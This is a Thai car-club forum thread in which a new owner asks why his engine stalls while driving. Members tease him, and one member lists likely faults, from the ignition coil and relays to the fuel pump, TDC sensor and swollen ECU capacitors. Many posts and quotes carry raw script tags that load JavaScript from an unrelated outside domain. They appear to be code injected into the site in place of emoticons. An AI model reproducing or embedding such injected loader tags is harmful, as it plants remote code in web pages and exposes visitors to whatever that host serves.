ตอบ
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
อังคาร, 11 มิถุนา 2013 22:34 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ขับดีๆเครื่องก็ดับวืดไปเฉยเลย พอปิดระบบไฟทั้งหมดแล้วสต๊าตเครื่องใหม่ ก็ติดปกติขับต่อได้ ซักพักหนึ่งก็ดับอีก   
ใครเคยเป็นบ้าง เกิดจากอะไร ต้องซ่อมยังใง ที่ใหนดีครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  song  Chonchy  Armdevil  ninenine  Rachen 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 11 มิถุนา 2013 22:40 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
อังคาร, 11 มิถุนา 2013 22:41 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
สมาชิกใหม่ฝากตัวด้วยครับ เพิ่งได้รถมาเจอปัญหาซะแล้ว
ขอคำแนะนำด้วยครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
อังคาร, 11 มิถุนา 2013 23:10 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




เหยินนิดเดียวเองนะ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 11 มิถุนา 2013 23:19 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ฟันเหยิน พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




เหยินนิดเดียวเองนะ




เจงเด่ะ
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
พุธ, 12 มิถุนา 2013 00:11 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
ฟันเหยิน พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




เหยินนิดเดียวเองนะ




เจงเด่ะ




<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></   สรุปว่าเพราะฟันเหยินใช่มะ  อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Oil_liO 
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
พุธ, 12 มิถุนา 2013 00:15 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
coco1340 พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
ฟันเหยิน พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




เหยินนิดเดียวเองนะ




เจงเด่ะ




<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></   สรุปว่าเพราะฟันเหยินใช่มะ  อิอิ




จะซ่อมฟันรึรถดีเนี๊ยะ T.T
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 12 มิถุนา 2013 00:24 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ฟันเหยิน พิมพ์ว่า:
coco1340 พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
ฟันเหยิน พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




เหยินนิดเดียวเองนะ




เจงเด่ะ




<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></   สรุปว่าเพราะฟันเหยินใช่มะ  อิอิ




จะซ่อมฟันรึรถดีเนี๊ยะ T.T




ฟันไปเฉาะเอาคอไอดีรั่วเครื่องดับเลย
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
พุธ, 12 มิถุนา 2013 08:42 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon



       
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 12 มิถุนา 2013 08:53 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
srithanon พิมพ์ว่า:
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon



       




..
ได้รับคำขอบคุณจาก: Oil_liO 
civic_ubon


ชื่อเล่น: ที

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1147

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1341
ให้คำขอบคุณ: 1307

ที่อยู่: อุบลราชธานี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 12 มิถุนา 2013 09:05 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ...

 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 12 มิถุนา 2013 09:10 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
srithanon พิมพ์ว่า:
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon



       




ข้อมูลแน่นมากเลยครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Oil_liO  ninenine 
Armdevil


ชื่อเล่น: อาร์ม นคร

เข้าร่วม: 19 เมษา 2012
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 567

ที่อยู่: นครศรีธรรมราช
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 12 มิถุนา 2013 12:07 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ไม่รู้ว่าเป็นอะราย เข้ามาเอาจัยช่วยคาปป
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Oil_liO 
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 12 มิถุนา 2013 12:39 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
มาเก็บข้อมูลคร๊าบบบบบบบบบ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Oil_liO 
time


ชื่อเล่น: เก่ง

เข้าร่วม: 22 ตุลา 2012
ตอบ: 226

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 149
ให้คำขอบคุณ: 141

ที่อยู่: 299 ม.7 ต.เกตรี อ.เมือง จ.สตูล
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 12 มิถุนา 2013 23:19 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ตกลงว่าหายยังครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Oil_liO 
Oil_liO


ชื่อเล่น: ออย

เข้าร่วม: 25 ธันวา 2010
ตอบ: 959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1157
ให้คำขอบคุณ: 1105

ที่อยู่: กรุงเทพมหานคร อุดรธานี
ปี: 2005
พฤหัส, 13 มิถุนา 2013 00:34 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
srithanon พิมพ์ว่า:
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon   



พยายามอ่านและทำความเข้าใจ แต่ยังไงก็งง >_< เข้าใจแต่ฟันเหยิน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 13 มิถุนา 2013 00:43 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
จริงๆแล้วปัญหาก้เกิดเพราะฟันเหยินเองนั่นแหละ








ก็มันรถของฟันเหยินหงะ
ได้รับคำขอบคุณจาก: Oil_liO 
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
ศุกร์, 14 มิถุนา 2013 00:50 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
srithanon พิมพ์ว่า:
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon



       



ขอบคุณมากครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
